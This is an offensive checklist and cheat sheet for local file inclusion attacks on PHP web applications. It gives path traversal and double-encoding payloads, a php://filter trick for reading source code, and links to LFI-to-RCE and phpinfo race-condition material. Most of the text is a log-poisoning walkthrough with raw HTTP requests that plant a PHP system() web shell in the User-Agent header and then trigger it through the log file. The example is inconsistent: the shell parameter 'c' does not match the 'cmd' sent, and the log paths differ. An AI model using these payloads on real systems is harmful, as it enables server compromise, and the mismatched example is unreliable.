LFI (path traversal)

local file inclusion

CHECKLIST

Basic Checks

1. try payload with ../../../

2. try with ....//.....//.....//

3. try without "../" , i.e., path=/etc/passwd

4. Encode / double encode payload

5. Try to Fetch source-code of page <php>

6. try LFI to RFI

7. check for upload directory , to upload payload

8. log poison

9. race condition

10. race condition in phpinfo

Fetching php sourc code

parameter=php://filter/convert.base64-encode/resource=page-name

LFI -> RCE

GitHub - RoqueNight/LFI---RCE-Cheat-Sheet: Transition form local file inclusion attacks to remote code exectionGitHub

LOG POISONING

if web application is vulnerable to LFI vulnerability then we can also head towards log poisoning Log poisoning can lead a LFI to RCE By default some applications like (php) makes logs of the user's who visited the website by using the "User-agent" header

in php application logs are stored under >>

/var/log/http-access.log
/var/log/httpd-error.log

in order to exploit it , we need to inject a command injection in USER-AGENT header :-

GET / HTTP/1.1
Host: 10.10.10.84
User-Agent: <?php system($_GET['c']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

After that we can simply call our function using the LFI :-

GET /browse.php?file=/var/log/httpd-access.log&cmd=whoami HTTP/1.1
Host: 10.10.10.84
User-Agent: 0xdf: <?php system($_GET['c']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

RACE CONDITION in PHPINFO

Explanation :-

https://insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf

payload :-

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/phpinfolfi.py